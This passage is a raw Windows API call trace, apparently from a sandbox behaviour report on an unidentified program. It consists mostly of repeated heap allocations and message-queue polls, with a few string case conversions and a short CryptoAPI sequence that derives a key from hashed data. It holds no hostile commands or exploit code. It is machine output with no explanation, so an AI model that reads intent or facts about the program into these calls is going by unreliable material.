Flags=0x0, Size=0x8) returned 0x24b1888 [0256.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0256.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0256.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0256.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0256.880] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0256.880] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0256.881] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0256.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0256.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0256.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0256.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0256.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0256.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0256.881] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.881] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0256.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0256.881] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0256.881] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0256.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0256.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0256.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0256.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0256.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0256.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0256.881] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0256.881] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0256.882] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0256.882] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0256.882] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0256.882] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0256.882] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0256.882] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0256.882] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0256.882] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.882] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0256.882] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.882] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0256.882] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.882] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0256.882] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0256.882] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0256.882] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0256.882] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0256.882] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0256.882] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0256.882] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.882] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0256.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0256.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0256.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0256.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0256.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0256.883] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0256.883] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.883] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0256.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0256.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0256.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0256.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0256.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0256.883] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0256.883] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0256.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0256.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0256.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0256.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0256.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0256.884] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0256.884] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.884] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0256.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0256.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0256.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0256.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0256.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0256.884] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0256.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0256.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0256.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0256.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0256.884] CryptCreateHash (in: hProv=0xad2698, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0256.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0256.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0256.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0256.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0256.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0256.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0256.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0256.885] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0256.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0256.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0256.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0256.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0256.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0256.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0256.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0256.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0256.887] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.887] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0256.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0256.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0256.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0256.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0256.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0256.887] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0256.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0256.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0256.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0256.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0256.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0256.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0256.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0256.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0256.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0256.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0256.888] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0256.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0256.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0256.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0256.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0256.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0256.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0256.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0256.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0256.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0256.888] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0256.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0256.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0256.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0256.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0256.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0256.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0256.889] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0256.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0256.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0256.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0256.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0256.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0256.889] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0256.889] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0256.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0256.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0256.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0256.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0256.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0256.889] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0256.889] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.890] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0256.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0256.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0256.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0256.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0256.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0256.890] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0256.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0256.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0256.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0256.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0256.890] CryptHashData (hHash=0xaa5860, pbData=0x24b2ba8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0256.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0256.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0256.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0256.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0256.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0256.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0256.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0256.891] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0256.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0256.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0256.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0256.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0256.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0256.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0256.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0256.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0256.891] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.891] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0256.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0256.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0256.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0256.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0256.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0256.891] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0256.892] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0256.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0256.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0256.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0256.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0256.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0256.892] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0256.892] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.892] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0256.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0256.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0256.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0256.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0256.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0256.892] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0256.892] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0256.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0256.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0256.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0256.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0256.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0256.893] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0256.893] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.893] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0256.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0256.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0256.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0256.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0256.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0256.893] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0256.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0256.893] CryptDeriveKey (in: hProv=0xad2698, Algid=0x6601, hBaseData=0xaa5860, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa5820) returned 1 [0256.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0256.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: 